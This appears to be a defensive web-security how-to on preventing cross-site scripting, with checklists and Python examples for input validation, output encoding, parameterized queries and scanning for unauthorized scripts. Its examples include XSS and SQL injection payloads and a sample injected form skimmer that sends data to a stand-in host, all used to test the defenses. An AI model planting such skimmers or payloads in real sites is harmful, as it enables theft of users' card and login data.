Cross-site scripting attacks
How-To: Prevent attackers from leveraging the XSS attack vector
Additional steps from Development to Deployment
**Developers**
- should determine what constitutes safe user input and reject everything else, whether it is plain text, JavaScript or any other unauthorized piece of code. Depending on the input box, developers can restrict the text to a set of allowed characters (leaving out the ones that cause trouble) and also limit the maximum number of characters
- should write code that ensures untrusted or improperly formatted data is never inserted directly into the HTML content; it has to be validated and encoded for the output context first, because a single unescaped value can compromise the whole web application
- should use prepared (parameterized) statements, a well-established defense, for every database query, in addition to the input validation described above
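The three developer steps above worked through as one piece of code. This is an added example written for this page, not code from the original article or from any product it mentions; the field rules (an allow-listed "display name" box and a free-text comment body), the sqlite table and the sample inputs are assumptions made for the demonstration.

```python
import html
import re
import sqlite3

# Assumed field rules for this example: a "display name" box that allows only letters,
# digits, space, dot, apostrophe and hyphen, at most 40 characters. Everything else is
# rejected outright (allow-list), not "cleaned up".
NAME_RE = re.compile(r"[A-Za-z0-9 .'-]{1,40}")


def is_valid_name(value: str) -> bool:
    """Allow-list check: True only if every character is permitted and the length is in range."""
    return NAME_RE.fullmatch(value) is not None


def validate_name(value: str) -> str:
    """Return the value unchanged if it passes the allow-list, otherwise reject it."""
    if not is_valid_name(value):
        raise ValueError("rejected: display name contains disallowed characters or is too long")
    return value


def render_comment_unsafe(author: str, body: str) -> str:
    """The mistake the article warns about: untrusted data spliced straight into HTML."""
    return f'<li data-author="{author}"><b>{author}</b>: {body}</li>'


def render_comment(author: str, body: str) -> str:
    """Hardened form: every untrusted value is encoded for the HTML context it lands in.

    html.escape(quote=True) turns < > & " ' into entities, so a value can neither close
    the attribute it sits in nor start a new tag. The free-text body cannot be allow-listed
    the way the name is, so output encoding is what protects it."""
    safe_author = html.escape(author, quote=True)
    safe_body = html.escape(body, quote=True)
    return f'<li data-author="{safe_author}"><b>{safe_author}</b>: {safe_body}</li>'


def setup_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    return conn


def store_and_fetch(conn: sqlite3.Connection, author: str, body: str) -> list:
    """Prepared statements: the SQL text is fixed and the values travel as parameters,
    so a quote or a semicolon in the input is stored as data, never parsed as syntax."""
    conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    return conn.execute(
        "SELECT author, body FROM comments WHERE author = ?", (author,)
    ).fetchall()


if __name__ == "__main__":
    # Constructed inputs: a legitimate name containing a quote, an XSS payload in the
    # free-text body, an injection-style string, and a name the allow-list must reject.
    author = validate_name("O'Brien")
    body = "<script>alert(document.cookie)</script>"
    print(render_comment_unsafe(author, body))   # the script tag reaches the browser intact
    print(render_comment(author, body))          # the script tag is rendered as text
    conn = setup_db()
    print(store_and_fetch(conn, author, "x'); DROP TABLE comments; --"))
    print(is_valid_name("<img src=x onerror=alert(1)>"))  # False: rejected at input
```

The name field shows the first step (reject rather than repair), the body field shows the second (encode for the HTML context, since free text cannot be allow-listed), and the sqlite calls show the third (the injection string is stored verbatim and the table survives). Encoding must match the context: html.escape is right for HTML text and quoted attributes, but a value placed inside a JavaScript block or a URL needs that context's encoding instead.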
**Website operators**
- should carefully choose third-party web app providers to ensure their products have the right security measures in place
- should test the web apps to ensure that they are not vulnerable to attacks involving cross-site scripting or SQL injection
- should continuously scan their sites in real time to detect any unauthorized code. Automated website vulnerability scanners (e.g. Nikto, OWASP ZAP) are only part of this
- have to be proactive: hire experienced professionals (white- or grey-hat) who can assess the web app's security against attacks like these with a custom approach
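One concrete form of the continuous scanning for unauthorized code described above. This is an added example written for this page, not the article's code or any scanner's: it parses a page's HTML, flags external scripts loaded from hosts outside an allow-list, and flags inline scripts whose SHA-256 digest is not in an approved baseline. The allow-list, the baseline and the sample page are constructed assumptions.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed baseline recorded from a known-good deployment: hosts the site may load
# scripts from, and SHA-256 digests of every approved inline script.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "static.example.com"}
APPROVED_INLINE_HASHES = {
    hashlib.sha256(b"window.dataLayer = window.dataLayer || [];").hexdigest(),
}


class ScriptCollector(HTMLParser):
    """Collects the src of every external <script> and the body of every inline one."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_inline = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser switches to CDATA mode inside <script>, so the whole body arrives here.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def find_unauthorized_scripts(page_html: str) -> list[str]:
    """Return one finding per script that is not covered by the baseline."""
    parser = ScriptCollector()
    parser.feed(page_html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlsplit(src).hostname
        # A relative src has no host and is same-origin; any other host must be allow-listed.
        if host is not None and host.lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"external script from unapproved host: {src}")
    for code in parser.inline:
        digest = hashlib.sha256(code.encode("utf-8")).hexdigest()
        if digest not in APPROVED_INLINE_HASHES:
            findings.append(f"inline script not in baseline (sha256 {digest[:16]}): {code[:60]}")
    return findings


# Constructed sample page: three legitimate scripts plus two injected ones, the kind of
# change that inserting a form-skimming script leaves behind.
SAMPLE_PAGE = """<html><head>
<script src="https://static.example.com/js/vendor.js"></script>
<script src="/js/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://evil.example.net/skim.js"></script>
<script>document.forms[0].addEventListener('submit', function () {
  new Image().src = 'https://evil.example.net/c?d=' + encodeURIComponent(document.forms[0].innerText);
});</script>
</head><body><form><input name="card"></form></body></html>"""


if __name__ == "__main__":
    for finding in find_unauthorized_scripts(SAMPLE_PAGE):
        print(finding)
```

Run against the fetched HTML of each monitored page on a schedule and alert on any finding. A host allow-list does not catch an attacker who modifies a same-origin script file in place, so a production baseline should also fetch each external script and compare its digest, the same check applied to the inline bodies here.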
========================================================================
The last step is important!
Anything less than a proactive, comprehensive approach to securing the sites will end in a breach of a great many consumers' personal data, which under regulations like GDPR also carries regulatory consequences.
As a good example of the do's and don'ts we might mention the recent attack on British Airways, but you can pick practically any of the large attacks of the past five years.
========================================================================
::Remember::
Just because a website is secure does not necessarily mean that the web application running on it is secure as well.
source: TechRepublic
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )